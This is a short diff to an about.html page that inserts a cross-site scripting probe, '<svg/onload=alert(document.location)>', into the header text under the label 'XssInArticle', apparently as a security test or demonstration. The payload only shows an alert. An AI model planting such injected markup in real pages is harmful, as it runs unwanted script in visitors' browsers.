--- a/about.html
+++ b/about.html
@@ -10,7 +10,7 @@
 <body>
     <!-- this is header -->
     <header>
-        <h2>Welcome to this Website</h2>
+        <h2>Welcome to this Website - XssInArticle<svg/onload=alert(document.location)> </h2>
     </header>
     
     <!-- this is the navigation -->
